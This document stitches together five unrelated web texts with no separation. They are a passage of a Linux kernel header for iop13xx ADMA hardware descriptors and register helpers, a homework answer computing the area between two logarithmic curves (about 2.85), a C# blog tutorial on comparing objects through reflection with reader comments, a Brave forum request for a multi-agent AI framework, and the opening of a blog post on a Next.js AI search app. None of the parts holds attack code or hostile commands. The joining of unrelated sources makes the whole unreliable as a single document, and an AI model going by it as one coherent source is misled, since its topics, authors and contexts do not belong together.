113 u32 h_upper_dest_addr;
114 u32 src0_addr;
115 u32 upper_src0_addr;
116 u32 src1_addr;
117 u32 upper_src1_addr;
118 u32 h_src_addr;
119 u32 h_upper_src_addr;
120 u32 d_src_addr;
121 u32 d_upper_src_addr;
122 u32 d_dest_addr;
123 u32 d_upper_dest_addr;
124 };
125
126 struct iop13xx_adma_desc_pq_update {
127 u32 next_desc;
128 u32 desc_ctrl;
129 u32 reserved;
130 u32 byte_count;
131 u32 p_dest_addr;
132 u32 p_upper_dest_addr;
133 u32 src0_addr;
134 u32 upper_src0_addr;
135 u32 src1_addr;
136 u32 upper_src1_addr;
137 u32 p_src_addr;
138 u32 p_upper_src_addr;
139 u32 q_src_addr;
140 struct {
141 unsigned int q_upper_src_addr:24;
142 unsigned int q_dmlt:8;
143 };
144 u32 q_dest_addr;
145 u32 q_upper_dest_addr;
146 };
147
148 static inline int iop_adma_get_max_xor(void)
149 {
150 return 16;
151 }
152
153 static inline u32 iop_chan_get_current_descriptor(struct iop_adma_chan *chan)
154 {
155 return __raw_readl(ADMA_ADAR(chan));
156 }
157
158 static inline void iop_chan_set_next_descriptor(struct iop_adma_chan *chan,
159 u32 next_desc_addr)
160 {
161 __raw_writel(next_desc_addr, ADMA_ANDAR(chan));
162 }
163
164 #define ADMA_STATUS_BUSY (1 << 13)
165
166 static inline char iop_chan_is_busy(struct iop_adma_chan *chan)
167 {
168 if (__raw_readl(ADMA_ACSR(chan)) &
169 ADMA_STATUS_BUSY)
170 return 1;
171 else
172 return 0;
173 }
174
175 static inline int
176 iop_chan_get_desc_align(struct iop_adma_chan *chan, int num_slots)
177 {
178 return 1;
179 }
180 #define iop_desc_is_aligned(x, y) 1
181
182 static inline int
183 iop_chan_memcpy_slot_count(size_t len, int *slots_per_op)
184 {
185 *slots_per_op = 1;
186 return 1;
187 }
188
189 #define iop_chan_interrupt_slot_count(s, c) iop_chan_memcpy_slot_count(0, s)
190
191 static inline int
192 iop_chan_memset_slot_count(size_t len, int *slots_per_op)
193 {
194 *slots_per_op = 1;
195 return 1;
196 }
197
198 static inline int
199 iop_chan_xor_slot_count(size_t len, int src_cnt, int *slots_per_op)
200 {
201 int num_slots;
202 /* slots_to_find = 1 for basic descriptor + 1 per 4 sources above 1
203 * (1 source => 8 bytes) (1 slot => 32 bytes)
204 */
205 num_slots = 1 + (((src_cnt - 1) << 3) >> 5);
206 if (((src_cnt - 1) << 3) & 0x1f)
207 num_slots++;
208
209 *slots_per_op = num_slots;
210
211 return num_slots;
212 }
213
214 #define ADMA_MAX_BYTE_COUNT (16 * 1024 * 1024)
215 #define IOP_ADMA_MAX_BYTE_COUNT ADMA_MAX_BYTE_COUNT
216 #define IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT ADMA_MAX_BYTE_COUNT
217 #define IOP_ADMA_XOR_MAX_BYTE_COUNT ADMA_MAX_BYTE_COUNT
218 #define iop_chan_zero_sum_slot_count(l, s, o) iop_chan_xor_slot_count(l, s, o)
219
220 static inline u32 iop_desc_get_dest_addr(struct iop_adma_desc_slot *desc,
221 struct iop_adma_chan *chan)
222 {
223 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
224 return hw_desc->dest_addr;
225 }
226
227 static inline u32 iop_desc_get_byte_count(struct iop_adma_desc_slot *desc,
228 struct iop_adma_chan *chan)
229 {
230 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
231 return hw_desc->byte_count_field.byte_count;
232 }
233
234 static inline u32 iop_desc_get_src_addr(struct iop_adma_desc_slot *desc,
235 struct iop_adma_chan *chan,
236 int src_idx)
237 {
238 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
239 return hw_desc->src[src_idx].src_addr;
240 }
241
242 static inline u32 iop_desc_get_src_count(struct iop_adma_desc_slot *desc,
243 struct iop_adma_chan *chan)
244 {
245 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
246 return hw_desc->desc_ctrl_field.src_select + 1;
247 }
248
249 static inline void
250 iop_desc_init_memcpy(struct iop_adma_desc_slot *desc, unsigned long flags)
251 {
252 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
253 union {
254 u32 value;
255 struct iop13xx_adma_desc_ctrl field;
256 } u_desc_ctrl;
257
258 u_desc_ctrl.value = 0;
259 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
260 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
261 hw_desc->desc_ctrl = u_desc_ctrl.value;
262 hw_desc->crc_addr = 0;
263 }
264
265 static inline void
266 iop_desc_init_memset(struct iop_adma_desc_slot *desc, unsigned long flags)
267 {
268 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
269 union {
270 u32 value;
271 struct iop13xx_adma_desc_ctrl field;
272 } u_desc_ctrl;
273
274 u_desc_ctrl.value = 0;
275 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
276 u_desc_ctrl.field.block_fill_en = 1;
277 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
278 hw_desc->desc_ctrl = u_desc_ctrl.value;
279 hw_desc->crc_addr = 0;
280 }
281
282 /* to do: support buffers larger than ADMA_MAX_BYTE_COUNT */
283 static inline void
284 iop_desc_init_xor(struct iop_adma_desc_slot *desc, int src_cnt,
285 unsigned long flags)
286 {
287 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
288 union {
289 u32 value;
290 struct iop13xx_adma_desc_ctrl field;
291 } u_desc_ctrl;
292
293 u_desc_ctrl.value = 0;
294 u_desc_ctrl.field.src_select = src_cnt - 1;
295 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
296 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
297 hw_desc->desc_ctrl = u_desc_ctrl.value;
298 hw_desc->crc_addr = 0;
299
300 }
301 #define iop_desc_init_null_xor(d, s, i) iop_desc_init_xor(d, s, i)
302
303 /* to do: support buffers larger than ADMA_MAX_BYTE_COUNT */
304 static inline int
305 iop_desc_init_zero_sum(struct iop_adma_desc_slot *desc, int src_cnt,
306 unsigned long flags)
307 {
308 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
309 union {
310 u32 value;
311 struct iop13xx_adma_desc_ctrl field;
312 } u_desc_ctrl;
313
314 u_desc_ctrl.value = 0;
315 u_desc_ctrl.field.src_select = src_cnt - 1;
316 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
317 u_desc_ctrl.field.zero_result = 1;
318 u_desc_ctrl.field.status_write_back_en = 1;
319 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
320 hw_desc->desc_ctrl = u_desc_ctrl.value;
321 hw_desc->crc_addr = 0;
322
323 return 1;
324 }
325
326 static inline void iop_desc_set_byte_count(struct iop_adma_desc_slot *desc,
327 struct iop_adma_chan *chan,
328 u32 byte_count)
329 {
330 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
331 hw_desc->byte_count = byte_count;
332 }
333
334 static inline void
335 iop_desc_set_zero_sum_byte_count(struct iop_adma_desc_slot *desc, u32 len)
336 {
337 int slots_per_op = desc->slots_per_op;
338 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc, *iter;
339 int i = 0;
340
341 if (len <= IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT) {
342 hw_desc->byte_count = len;
343 } else {
344 do {
345 iter = iop_hw_desc_slot_idx(hw_desc, i);
346 iter->byte_count = IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT;
347 len -= IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT;
348 i += slots_per_op;
349 } while (len > IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT);
350
351 if (len) {
352 iter = iop_hw_desc_slot_idx(hw_desc, i);
353 iter->byte_count = len;
354 }
355 }
356 }
357
358
359 static inline void iop_desc_set_dest_addr(struct iop_adma_desc_slot *desc,
360 struct iop_adma_chan *chan,
361 dma_addr_t addr)
362 {
363 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
364 hw_desc->dest_addr = addr;
365 hw_desc->upper_dest_addr = 0;
366 }
367
368 static inline void iop_desc_set_memcpy_src_addr(struct iop_adma_desc_slot *desc,
369 dma_addr_t addr)
370 {
371 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
372 hw_desc->src[0].src_addr = addr;
373 hw_desc->src[0].upper_src_addr = 0;
374 }
375
376 static inline void iop_desc_set_xor_src_addr(struct iop_adma_desc_slot *desc,
377 int src_idx, dma_addr_t addr)
378 {
379 int slot_cnt = desc->slot_cnt, slots_per_op = desc->slots_per_op;
380 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc, *iter;
381 int i = 0;
382
383 do {
384 iter = iop_hw_desc_slot_idx(hw_desc, i);
385 iter->src[src_idx].src_addr = addr;
386 iter->src[src_idx].upper_src_addr = 0;
387 slot_cnt -= slots_per_op;
388 if (slot_cnt) {
389 i += slots_per_op;
390 addr += IOP_ADMA_XOR_MAX_BYTE_COUNT;
391 }
392 } while (slot_cnt);
393 }
394
395 static inline void
396 iop_desc_init_interrupt(struct iop_adma_desc_slot *desc,
397 struct iop_adma_chan *chan)
398 {
399 iop_desc_init_memcpy(desc, 1);
400 iop_desc_set_byte_count(desc, chan, 0);
401 iop_desc_set_dest_addr(desc, chan, 0);
402 iop_desc_set_memcpy_src_addr(desc, 0);
403 }
404
405 #define iop_desc_set_zero_sum_src_addr iop_desc_set_xor_src_addr
406
407 static inline void iop_desc_set_next_desc(struct iop_adma_desc_slot *desc,
408 u32 next_desc_addr)
409 {
410 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
411 BUG_ON(hw_desc->next_desc);
412 hw_desc->next_desc = next_desc_addr;
413 }
414
415 static inline u32 iop_desc_get_next_desc(struct iop_adma_desc_slot *desc)
416 {
417 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
418 return hw_desc->next_desc;
419 }
420
421 static inline void iop_desc_clear_next_desc(struct iop_adma_desc_slot *desc)
422 {
423 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
424 hw_desc->next_desc = 0;
425 }
426
427 static inline void iop_desc_set_block_fill_val(struct iop_adma_desc_slot *desc,
428 u32 val)
429 {
430 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
431 hw_desc->block_fill_data = val;
432 }
433
434 static inline int iop_desc_get_zero_result(struct iop_adma_desc_slot *desc)
435 {
436 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
437 struct iop13xx_adma_desc_ctrl desc_ctrl = hw_desc->desc_ctrl_field;
438 struct iop13xx_adma_byte_count byte_count = hw_desc->byte_count_field;
439
440 BUG_ON(!(byte_count.tx_complete && desc_ctrl.zero_result));
441
442 if (desc_ctrl.pq_xfer_en)
443 return byte_count.zero_result_err_q;
444 else
445 return byte_count.zero_result_err;
446 }
447
448 static inline void iop_chan_append(struct iop_adma_chan *chan)
449 {
450 u32 adma_accr;
451
452 adma_accr = __raw_readl(ADMA_ACCR(chan));
453 adma_accr |= 0x2;
454 __raw_writel(adma_accr, ADMA_ACCR(chan));
455 }
456
457 static inline void iop_chan_idle(int busy, struct iop_adma_chan *chan)
458 {
459 do { } while (0);
460 }
461
462 static inline u32 iop_chan_get_status(struct iop_adma_chan *chan)
463 {
464 return __raw_readl(ADMA_ACSR(chan));
465 }
466
467 static inline void iop_chan_disable(struct iop_adma_chan *chan)
468 {
469 u32 adma_chan_ctrl = __raw_readl(ADMA_ACCR(chan));
470 adma_chan_ctrl &= ~0x1;
471 __raw_writel(adma_chan_ctrl, ADMA_ACCR(chan));
472 }
473
474 static inline void iop_chan_enable(struct iop_adma_chan *chan)
475 {
476 u32 adma_chan_ctrl;
477
478 adma_chan_ctrl = __raw_readl(ADMA_ACCR(chan));
479 adma_chan_ctrl |= 0x1;
480 __raw_writel(adma_chan_ctrl, ADMA_ACCR(chan));
481 }
482
483 static inline void iop_adma_device_clear_eot_status(struct iop_adma_chan *chan)
484 {
485 u32 status = __raw_readl(ADMA_ACSR(chan));
486 status &= (1 << 12);
487 __raw_writel(status, ADMA_ACSR(chan));
488 }
489
490 static inline void iop_adma_device_clear_eoc_status(struct iop_adma_chan *chan)
491 {
492 u32 status = __raw_readl(ADMA_ACSR(chan));
493 status &= (1 << 11);
494 __raw_writel(status, ADMA_ACSR(chan));
495 }
496
497 static inline void iop_adma_device_clear_err_status(struct iop_adma_chan *chan)
498 {
499 u32 status = __raw_readl(ADMA_ACSR(chan));
500 status &= (1 << 9) | (1 << 5) | (1 << 4) | (1 << 3);
501 __raw_writel(status, ADMA_ACSR(chan));
502 }
503
504 static inline int
505 iop_is_err_int_parity(unsigned long status, struct iop_adma_chan *chan)
506 {
507 return test_bit(9, &status);
508 }
509
510 static inline int
511 iop_is_err_mcu_abort(unsigned long status, struct iop_adma_chan *chan)
512 {
513 return test_bit(5, &status);
514 }
515
516 static inline int
517 iop_is_err_int_tabort(unsigned long status, struct iop_adma_chan *chan)
518 {
519 return test_bit(4, &status);
520 }
521
522 static inline int
523 iop_is_err_int_mabort(unsigned long status, struct iop_adma_chan *chan)
524 {
525 return test_bit(3, &status);
526 }
527
528 static inline int
529 iop_is_err_pci_tabort(unsigned long status, struct iop_adma_chan *chan)
530 {
531 return 0;
532 }
533
534 static inline int
535 iop_is_err_pci_mabort(unsigned long status, struct iop_adma_chan *chan)
536 {
537 return 0;
538 }
539
540 static inline int
541 iop_is_err_split_tx(unsigned long status, struct iop_adma_chan *chan)
542 {
543 return 0;
544 }
545
546 #endif /* _ADMA_H */
547
This page was automatically generated by the LXR engine.
Welcome :: Homework Help and Answers :: Mathskey.com
Find the area of the region bounded by the given curves.y = 6x^2 ln x, y = 24 ln x?
+1 vote
Find the area of the region bounded by the given curves.y = 6x^2 ln x, y = 24 ln x?
asked Feb 5, 2013 in CALCULUS by futai Scholar
1 Answer
+2 votes
y = 6x^2 ln x, y = 24 ln x
Set the two curves equal to find the intersection points:
24 ln x - 6x^2 ln x = 0
Multiply each side by negative one.
6x^2 ln x - 24 ln x = 0
Take out the common factor ln x.
ln x (6x^2 - 24) = 0
So ln x = 0 or 6x^2 - 24 = 0.
ln x = 0 gives x = e^0 = 1.
6x^2 - 24 = 0 gives 6x^2 = 24, so x^2 = 4 and x = ±2. Since ln x is only defined for x > 0, keep x = 2.
The curves therefore intersect at x = 1 and x = 2. On the interval 1 < x < 2 we have 24 ln x > 6x^2 ln x, so the enclosed area A is the top curve minus the bottom curve:
A = ∫ from 1 to 2 of (24 ln x - 6x^2 ln x) dx
Using the standard integrals ∫ ln x dx = x ln x - x and ∫ x^2 ln x dx = (x^3/3) ln x - x^3/9:
A = 24[x ln x - x] - 6[(x^3/3) ln x - x^3/9], evaluated from 1 to 2
= 24[(2 ln 2 - 2) - (-1)] - 6[((8/3) ln 2 - 8/9) - (-1/9)]
= 48 ln 2 - 24 - 16 ln 2 + 14/3
= 32 ln 2 - 24 + 14/3 (where ln is the natural logarithm)
= 32(0.69315) - 24 + 4.6667
≈ 2.85
The area of the region bounded by the curves y = 6x^2 ln x and y = 24 ln x is approximately 2.85 square units.
answered Feb 6, 2013 by richardson Scholar
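The closed-form value 32 ln 2 - 24 + 14/3 can be sanity-checked numerically. The following is a standalone Python sketch (not part of the original answer) comparing it against a simple midpoint-rule integration of the vertical gap between the two curves:

```python
import math

# Closed-form result derived above: 32 ln 2 - 24 + 14/3
closed_form = 32 * math.log(2) - 24 + 14 / 3

def gap(x):
    """Vertical distance between the curves on [1, 2]: top minus bottom."""
    return 24 * math.log(x) - 6 * x**2 * math.log(x)

# Midpoint-rule integration of gap(x) over [1, 2].
n = 100_000
h = (2 - 1) / n
numeric = sum(gap(1 + (i + 0.5) * h) for i in range(n)) * h

print(round(closed_form, 4))  # 2.8474
print(round(numeric, 4))      # 2.8474
```

Both values agree at about 2.85 square units, confirming the answer.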
Comparing the properties of two objects via Reflection and C#
As part of the refactoring I was doing to the load code for crawler projects I needed a way of verifying that new code was loading data correctly. As it would be extremely time consuming to manually compare the objects, I used Reflection to compare the different objects and their properties. This article briefly describes the process and provides a complete helper function you can use in your own projects.
This code is loosely based on a Stack Overflow question, but I have heavily modified and expanded the original concept.
Obtaining a list of properties
The ability to analyze assemblies and their component pieces is directly built into the .NET Framework, and something I really appreciate - I remember the nightmares of trying to work with COM type libraries in Visual Basic many years ago!
The Type class represents a type declaration in your project, such as a class or enumeration. You can either use the GetType method of any object to get its underlying type, or use the typeof keyword to access a type from its type name.
Type typeA;
Type typeB;
int value;
value = 1;
typeA = value.GetType();
typeB = typeof(int);
Once you have a type, you can call the GetProperties method to return a list of PropertyInfo objects representing the available properties of the type. Several methods, including GetProperties, accept a BindingFlags argument; these flags allow you to define the type of information returned, such as public members or instance members.
In this case, I want all public instance members which can be read from and which are not included in a custom ignore list.
foreach (PropertyInfo propertyInfo in objectType.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Contains(p.Name)))
{
}
Retrieving the value of a property
The PropertyInfo class has a GetValue method that can be used to read the value of a property. Its most basic usage is to pass in the instance object (or null if you want to read a static property) and any index parameters (or null if no index parameters are supported).
object valueA;
object valueB;
valueA = propertyInfo.GetValue(objectA, null);
valueB = propertyInfo.GetValue(objectB, null);
The sample function described in this article doesn't currently support indexed properties.
Determining if a property can be directly compared
Some properties are simple types, such as an int or a string and are very easy to compare. What happens if a property returns some other object such as a collection of strings, or a complex class?
In this case, I try to see if the type supports IComparable by calling the IsAssignableFrom method. You need to call this on the target type (here, IComparable), passing in the source type.
return typeof(IComparable).IsAssignableFrom(type)
I also check the IsPrimitive and IsValueType properties of the source type, although this is possibly redundant as all the base types I've checked so far all support IComparable.
Directly comparing values
Assuming that I can directly compare a value, first I check if one of the values is null - if one value is null and the other isn't, I immediately return a mismatch.
Otherwise, if IComparable is available, then I obtain an instance of it from the first value and call its CompareTo method, passing in the second value.
If IComparable is not supported, then I fallback to object.Equals.
bool result;
IComparable selfValueComparer;
selfValueComparer = valueA as IComparable;
if (valueA == null && valueB != null || valueA != null && valueB == null)
result = false; // one of the values is null
else if (selfValueComparer != null && selfValueComparer.CompareTo(valueB) != 0)
result = false; // the comparison using IComparable failed
else if (!object.Equals(valueA, valueB))
result = false; // the comparison using Equals failed
else
result = true; // match
return result;
Comparing objects
If the values could not be directly compared, and do not implement IEnumerable (as described in the next section) then I assume the properties are objects and call the compare objects function again on the properties.
This works nicely, but has one critical flaw - if you have a child object which has a property reference to a parent item, then the function will get stuck in a recursive loop. Currently the only workaround is to ensure that such parent properties are excluded via the ignore list functionality of the compare function.
Comparing collections
If the direct compare check failed, but the property type supports IEnumerable, then some Linq is used to obtain the collection of items.
To save time, a count check is made and if the counts do not match (or one of the collections is null and the other is not), then an automatic mismatch is returned. If the counts do match, then all items are compared in the same manner as the parent objects.
IEnumerable<object> collectionItems1;
IEnumerable<object> collectionItems2;
int collectionItemsCount1;
int collectionItemsCount2;
collectionItems1 = ((IEnumerable)valueA).Cast<object>();
collectionItems2 = ((IEnumerable)valueB).Cast<object>();
collectionItemsCount1 = collectionItems1.Count();
collectionItemsCount2 = collectionItems2.Count();
I have tested this code on generic lists such as List<string>, and on strongly typed collections which inherit from Collection<TValue> with success.
The code
Below is the comparison code. Please note that it won't handle all situations - as mentioned indexed properties aren't supported. In addition, if you throw a complex object such as a DataReader I suspect it will throw a fit on that. I also haven't tested it on generic properties, it'll probably crash on those too. But it has worked nicely for the original purpose I wrote it for.
Also, as I was running this from a Console application, you may wish to replace the calls to Console.WriteLine with either Debug.WriteLine or even return them as an out parameter.
/// <summary>
/// Compares the properties of two objects of the same type and returns if all properties are equal.
/// </summary>
/// <param name="objectA">The first object to compare.</param>
/// <param name="objectB">The second object to compare.</param>
/// <param name="ignoreList">A list of property names to ignore from the comparison.</param>
/// <returns><c>true</c> if all property values are equal, otherwise <c>false</c>.</returns>
public static bool AreObjectsEqual(object objectA, object objectB, params string[] ignoreList)
{
bool result;
if (objectA != null && objectB != null)
{
Type objectType;
objectType = objectA.GetType();
result = true; // assume by default they are equal
foreach (PropertyInfo propertyInfo in objectType.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Contains(p.Name)))
{
object valueA;
object valueB;
valueA = propertyInfo.GetValue(objectA, null);
valueB = propertyInfo.GetValue(objectB, null);
// if it is a primitive type, value type or implements IComparable, just directly try and compare the value
if (CanDirectlyCompare(propertyInfo.PropertyType))
{
if (!AreValuesEqual(valueA, valueB))
{
Console.WriteLine("Mismatch with property '{0}.{1}' found.", objectType.FullName, propertyInfo.Name);
result = false;
}
}
// if it implements IEnumerable, then scan any items
else if (typeof(IEnumerable).IsAssignableFrom(propertyInfo.PropertyType))
{
IEnumerable<object> collectionItems1;
IEnumerable<object> collectionItems2;
int collectionItemsCount1;
int collectionItemsCount2;
// null check
if (valueA == null && valueB != null || valueA != null && valueB == null)
{
Console.WriteLine("Mismatch with property '{0}.{1}' found.", objectType.FullName, propertyInfo.Name);
result = false;
}
else if (valueA != null && valueB != null)
{
collectionItems1 = ((IEnumerable)valueA).Cast<object>();
collectionItems2 = ((IEnumerable)valueB).Cast<object>();
collectionItemsCount1 = collectionItems1.Count();
collectionItemsCount2 = collectionItems2.Count();
// check the counts to ensure they match
if (collectionItemsCount1 != collectionItemsCount2)
{
Console.WriteLine("Collection counts for property '{0}.{1}' do not match.", objectType.FullName, propertyInfo.Name);
result = false;
}
// and if they do, compare each item... this assumes both collections have the same order
else
{
for (int i = 0; i < collectionItemsCount1; i++)
{
object collectionItem1;
object collectionItem2;
Type collectionItemType;
collectionItem1 = collectionItems1.ElementAt(i);
collectionItem2 = collectionItems2.ElementAt(i);
collectionItemType = collectionItem1.GetType();
if (CanDirectlyCompare(collectionItemType))
{
if (!AreValuesEqual(collectionItem1, collectionItem2))
{
Console.WriteLine("Item {0} in property collection '{1}.{2}' does not match.", i, objectType.FullName, propertyInfo.Name);
result = false;
}
}
else if (!AreObjectsEqual(collectionItem1, collectionItem2, ignoreList))
{
Console.WriteLine("Item {0} in property collection '{1}.{2}' does not match.", i, objectType.FullName, propertyInfo.Name);
result = false;
}
}
}
}
}
else if (propertyInfo.PropertyType.IsClass)
{
if (!AreObjectsEqual(propertyInfo.GetValue(objectA, null), propertyInfo.GetValue(objectB, null), ignoreList))
{
Console.WriteLine("Mismatch with property '{0}.{1}' found.", objectType.FullName, propertyInfo.Name);
result = false;
}
}
else
{
Console.WriteLine("Cannot compare property '{0}.{1}'.", objectType.FullName, propertyInfo.Name);
result = false;
}
}
}
else
result = object.Equals(objectA, objectB);
return result;
}
/// <summary>
/// Determines whether value instances of the specified type can be directly compared.
/// </summary>
/// <param name="type">The type.</param>
/// <returns>
/// <c>true</c> if value instances of the specified type can be directly compared; otherwise, <c>false</c>.
/// </returns>
private static bool CanDirectlyCompare(Type type)
{
return typeof(IComparable).IsAssignableFrom(type) || type.IsPrimitive || type.IsValueType;
}
/// <summary>
/// Compares two values and returns whether they are the same.
/// </summary>
/// <param name="valueA">The first value to compare.</param>
/// <param name="valueB">The second value to compare.</param>
/// <returns><c>true</c> if both values match, otherwise <c>false</c>.</returns>
private static bool AreValuesEqual(object valueA, object valueB)
{
bool result;
IComparable selfValueComparer;
selfValueComparer = valueA as IComparable;
if (valueA == null && valueB != null || valueA != null && valueB == null)
result = false; // one of the values is null
else if (selfValueComparer != null && selfValueComparer.CompareTo(valueB) != 0)
result = false; // the comparison using IComparable failed
else if (!object.Equals(valueA, valueB))
result = false; // the comparison using Equals failed
else
result = true; // match
return result;
}
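For readers outside the .NET world, the same reflection-driven idea can be sketched in a few lines of Python. This is purely an illustration of the technique, not part of the original C# listing; the Point class and function names are hypothetical.

```python
def are_objects_equal(a, b, ignore=()):
    """Compare two objects attribute-by-attribute, like AreObjectsEqual above."""
    if a is None or b is None:
        return a is b
    if type(a) is not type(b):
        return False
    for name, value_a in vars(a).items():
        if name in ignore:
            continue
        value_b = getattr(b, name, None)
        if isinstance(value_a, (list, tuple)):
            # mirror the IEnumerable branch: compare counts, then items in order
            if value_b is None or len(value_a) != len(value_b):
                return False
            if any(x != y for x, y in zip(value_a, value_b)):
                return False
        elif value_a != value_b:
            return False
    return True

class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y

print(are_objects_equal(Point(1, 2), Point(1, 2)))                  # True
print(are_objects_equal(Point(1, 2), Point(1, 3)))                  # False
print(are_objects_equal(Point(1, 2), Point(1, 3), ignore=("y",)))   # True
```

As in the C# version, the ignore list lets you skip properties that would otherwise cause false mismatches.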
I hope you find these helper methods useful; this article will be updated if and when the methods are expanded with new functionality.
Update History
• 2010-11-05 - First published
• 2020-11-21 - Updated formatting
About The Author
The founder of Cyotek, Richard enjoys creating new blog content for the site. Much more though, he likes to develop programs, and can often be found writing reams of code. A long-term gamer, he has aspirations of one day creating an epic video game. Until that time, he is mostly content with adding new bugs to WebCopy and the other Cyotek products.
Comments
Calabonga
That's cool! Thanks! But reflection is very slow... :)
sv
A System.StackOverflowException occurs if the objects have circular reference properties.
Richard Moss
Hello,
Yes it will - this is why the method supports the ignoreList array - any properties found matching values in this array will be skipped. This is sufficient for the purposes I was using this code for.
Regards; Richard Moss
anantharengan
Thanks a lot
Jason
How about List<T>? Fails on
valueA = propertyInfo.GetValue( objectA, null );
Knoxi
I'm wondering if someone solved the problem about List<T>? This would be great!
Richard Moss
Hello,
I haven't looked into this yet, I'll take a look and see what's wrong over the weekend.
Regards; Richard Moss
Suri
This is a nice post. It helped a lot with the quick solution I've been looking for: an "object value comparer utility" for my project. Thanks a lot.
Richard Moss
Glad you found it helpful!
Suri
I just added a few more simple lines of code for my requirement at the beginning to do some extra checks to avoid the loop:
bool result;
if (objectActual != null && objectModified != null)
{
Type objectTypeActual;
Type objectTypeModified;
result = true; // assume by default they are equal
objectTypeActual = objectActual.GetType();
objectTypeModified = objectModified.GetType();
if(objectTypeActual.FullName != objectTypeModified.FullName)
{
Console.WriteLine("Objects are of different type. Cannot Compare '{0}' & '{1}'.", objectTypeActual.FullName, objectTypeModified.FullName);
result = false;
return result;
}
var allPropertyInfos = objectTypeActual.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Any(x => x.Contains(p.Name)));
var allPropertyInfosModified = objectTypeModified.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Any(x => x.Contains(p.Name)));
if (allPropertyInfos.Count() == 0 && allPropertyInfosModified.Count() == 0)
{
Console.WriteLine("There are no properties in these objects to compare. These are both equal.");
result = true;
return result;
}
if (allPropertyInfos.Count() <= 0)
{
Console.WriteLine("Object of type '{0}' does not have any properties to Compare.", objectTypeActual.FullName);
result = false;
return result;
}
if (allPropertyInfosModified.Count() <= 0)
{
Console.WriteLine("Object of type '{0}' does not have any properties to Compare.", objectTypeModified.FullName);
result = false;
return result;
}
foreach (PropertyInfo propertyInfo in allPropertyInfos)
{ .....
aadilah
Dictionary not supported.
John Campbell
Did you ever get around to taking a look at the problem about List<T> failing on
valueA = propertyInfo.GetValue( objectA, null );
?
Apart from that, it's a very useful little routine :-)
Sujith
Thanks a lot for this code. It saved my time
Dmitry
Thanks! It works for me. I use the comparer for unit tests.
cassini
How about editing one object if there is a mismatch between objects... how can I remove an element from a property list? :((
Vijay
Thank you! Great article. Saved me tons of time.
J-S
May I suggest that you exit the loop as soon as possible when results == false as there is absolutely no need to continue since the answer is already found and more importantly because we're using "costly" algorithm (reflection)?
Richard Moss
Hello,
You're right of course, but actually I did that deliberately. This was because I wrote this code for use in testing (quite often I don't add IEquatable or IComparable to my classes) and I remember specifically getting really annoyed when tests would fail, I'd fix the first mismatch, but then I'd have to wait for them to run again to get the next. By not breaking out of that loop early I could get all mismatches at once and then fix them at once - I was never worried about the inefficiency as it was "just" testing.
Regards; Richard Moss
Babuji Godem
Great article.
Software Engineer
Still a great resource for understanding reflection. Thanks for sharing!
Brave "Multi-agent system" "Framework"
(this article was written mostly using ChatGPT)
Hello Brave community,
I am writing to request that the Brave browser consider integrating a multi-agent system framework, specifically for different AI’s. A multi-agent system is a decentralized system composed of multiple interacting intelligent agents, where each agent is autonomous and able to perceive its environment and take actions based on its own decision-making.
Having a multi-agent system framework in the Brave browser would enable AI agents to communicate and collaborate with each other, allowing for more advanced and efficient functionality. For example, an AI agent focused on security could work together with an AI agent focused on browsing history to provide more comprehensive privacy protection for the user. Additionally, an AI agent focused on content filtering could work with an AI agent focused on personalized recommendations to provide a more seamless browsing experience.
The integration of a multi-agent system framework would also provide an open platform for third-party developers to create and integrate their own AI agents, further expanding the capabilities of the Brave browser. This would also provide a way to improve the user experience by creating the perfect balance between user privacy and security and the ability to provide personalized and relevant content.
This integration of multi-agent system framework with Brave browser would open a new horizon for the Brave community and AI researchers. There would be a lot of possibilities to explore in this direction such as creating a decentralized AI network, creating a more efficient and faster browsing experience, having a more sophisticated security system, and many more.
I believe this feature would be a valuable addition to the Brave browser and would greatly benefit the community. I would appreciate any feedback or suggestions on how to move forward with this request, and also if there is any existing work that Brave team is doing in this direction.
Thank you for your time and consideration.
Best,
Priyanshu Joshi
Designly Blog
Building an AI Search App with Next.js and OpenAI: A Step-by-step Guide
Posted in Full-Stack Development by Jay Simons
Published on July 9, 2023
In the burgeoning era of artificial intelligence and machine learning, harnessing the power of AI to enhance the capabilities of your web application is no longer a luxury, but a necessity. As developers and data scientists, the onus is on us to stay updated with the dynamic landscape of technology and to create the most efficient and effective tools for our end-users.
